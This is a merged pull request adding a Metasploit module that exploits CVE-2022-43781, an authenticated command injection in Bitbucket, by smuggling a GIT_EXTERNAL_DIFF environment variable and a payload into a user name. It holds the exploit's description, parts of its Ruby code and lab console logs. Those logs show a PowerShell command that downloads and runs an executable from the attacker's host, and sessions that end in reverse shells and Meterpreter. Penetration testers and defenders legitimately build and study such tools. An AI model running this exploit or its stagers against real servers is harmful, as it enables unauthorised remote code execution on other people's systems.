### PR TITLE
Add exploit for Bitbucket env var RCE (CVE-2022-43781)

### PR DESCRIPTION
**Pull request by space-r7**
## Description

This adds an exploit for CVE-2022-43781.

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
will be run once the Bitbucket application is coerced into generating a diff.

This module requires at least admin credentials, as admins and above
only have the option to change their user name.

## Verification

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/multi/http/bitbucket_env_var_rce`
- [ ] Do: `set USERNAME <username>`
- [ ] Do: `set PASSWORD <pass>`
- [ ] Do: `run`
- [ ] You should get a shell.

## Scenarios

```
msf6 > use exploit/multi/http/bitbucket_env_var_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
rhost => 192.168.140.171
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
username => admin
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
password => P@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
target => 2
msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version 7.18.1 of Bitbucket
[+] The target appears to be vulnerable.
[*] Retrieving security token
[*] Project creation was successful
[+] Successfully created repository 'GqFji'
[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
[*] Command Stager progress -  75.19% done (97/129 bytes)
[*] Sending stage (175686 bytes) to 192.168.140.171
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
[*] Command Stager progress -  86.05% done (111/129 bytes)
[*] Command Stager progress - 100.00% done (129/129 bytes)
[*] Changing user name back to 'admin'
[*] Attempting to delete repository 'GqFji'
[+] Repository has been deleted
[*] Now attempting to delete project 'eTzDRa'
[+] Project has been deleted

meterpreter > getuid
Server username: DESKTOP-5JSUGC8\atlbitbucket
meterpreter > sysinfo
Computer        : DESKTOP-5JSUGC8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
```

### CODE REVIEW

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @space-r7 for this module! I just left a few minor comments/suggestions for you to review when you get a chance. Otherwise, it looks good to me. I tested against version 7.18.1 on Ubuntu and it works great. I'll test other platforms and Bitbucket versions now.

File: modules/exploits/multi/http/bitbucket_env_var_rce.rb [hunk 1]
```diff
@@ -0,0 +1,540 @@
...
+          'y4er', # PoC and blog post
+          'Shelby Pace' # Metasploit Module
+        ],
+        'References' => [
+          [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],
+          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],
+          [ 'CVE', '2022-43781']
+        ],
+        'Platform' => [ 'win', 'unix', 'linux' ],
+        'Privileged' => false,
```
[the remark this answers is not in the document]
Comment (space-r7) [reply modules/exploits/multi/http/bitbucket_env_var_rce.rb:44]: No, you're right! I'll get this changed shortly, thanks!

File: modules/exploits/multi/http/bitbucket_env_var_rce.rb [hunk 2]
```diff
@@ -0,0 +1,540 @@
...
+
+    new_file_data = Rex::Text.rand_text_alpha(5..20)
+    new_blob_object = GitObject.build_blob_object(new_file_data)
+    new_file = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
+
+    new_file_data = {
+      mode: '100755',
+      file_name: new_file,
+      sha1: new_blob_object.sha1
+    }
```
[the remark this answers is not in the document]
Comment (space-r7) [reply modules/exploits/multi/http/bitbucket_env_var_rce.rb:317]: Will do!

File: modules/exploits/multi/http/bitbucket_env_var_rce.rb [hunk 3]
```diff
@@ -0,0 +1,540 @@
...
+      'vars_get' => { 'name' => curr_uname }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to access user page') unless res
+    scripts = res.get_html_document&.search('script')
+    fail_with(Failure::UnexpectedReply, 'Couldn\'t obtain list of scripts') unless scripts
+    scripts = scripts.select { |script| script&.children&.text&.include?("name\":\"#{curr_uname}\"") }
+    fail_with(Failure::UnexpectedReply, 'Failed to get scripts that match user name') unless scripts
+
+    matched_id = scripts&.first&.children&.text&.match(/"id":(\d+)/)
```
[the remark this answers is not in the document]
Comment (space-r7) [reply modules/exploits/multi/http/bitbucket_env_var_rce.rb:358]: This is nice, thank you!

File: modules/exploits/multi/http/bitbucket_env_var_rce.rb [hunk 4]
```diff
@@ -0,0 +1,540 @@
...
+      execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.')
+    when :linux_dropper
+      execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)
+    when :unix_cmd
+      unless change_username(datastore['USERNAME'], uname_payload(payload.encoded.strip))
+        fail_with(Failure::UnexpectedReply, 'User name change failed. The user may not have the correct permissions')
+      end
+
+      @curr_uname = uname_payload(payload.encoded.strip)
+      view_commit_diff(@latest_commit, @first_commit, @diff_file)
```
[the remark this answers is not in the document]
Comment (space-r7) [reply modules/exploits/multi/http/bitbucket_env_var_rce.rb:594]: Yea, I think that should work

File: documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md [hunk 5]
```diff
@@ -0,0 +1,268 @@
...
+add the line `mesh.enabled=false`, save the file, and restart Bitbucket.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
+4. Do: `set USERNAME <username>`
+5. Do: `set PASSWORD <pass>`
+6. Do: `run`
```
[the remark this answers is not in the document]
Comment (space-r7) [reply documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md:72]: Will add those, thank you!

**Comment by space-r7** [comment]
Thank you for the review! Just pushed up fixes.

<details><summary>Tested with latest changes</summary>

```
msf6 > use exploit/multi/http/bitbucket_env_var_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username administrator
username => administrator
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
password => S3cureP@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Versions 8.* are vulnerable only if the mesh setting is disabled
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'dQLuZSIiu'
[+] Commits added: d4470275286866bc36a43252515fe3f1a743e593, 0188f4323490bb4037a4a9c2c377890773628cb0
[*] Sending payload
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.149:40440) at 2023-03-15 11:14:22 -0500
[*] Changing user name back to 'administrator'
[+] Repository has been deleted
[+] Project has been deleted

uname -a
Linux gitlab-virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y

[*] 192.168.140.149 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 1
target => 1
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Versions 8.* are vulnerable only if the mesh setting is disabled
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'DVWqePE'
[+] Commits added: 8354c097a1ed3bed10b56699f6357df909393a9e, 7e08de2b353e4b2de04e31e90b93ddb54cefedb9
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/B2lm1a2CzLhI
[*] Client 192.168.140.149 (Wget/1.21.2) requested /B2lm1a2CzLhI
[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
[*] Command Stager progress -  53.04% done (61/115 bytes)
[*] Command Stager progress -  72.17% done (83/115 bytes)
[*] Sending stage (1017704 bytes) to 192.168.140.149
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:37728) at 2023-03-15 11:15:08 -0500
[*] Command Stager progress -  83.48% done (96/115 bytes)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Changing user name back to 'administrator'
[+] Repository has been deleted
[+] Project has been deleted

meterpreter > getuid
```

</details>

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
# Release Notes

This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing Bitbucket application into generating a diff. This module requires at least admin credentials.

**Pull request merged**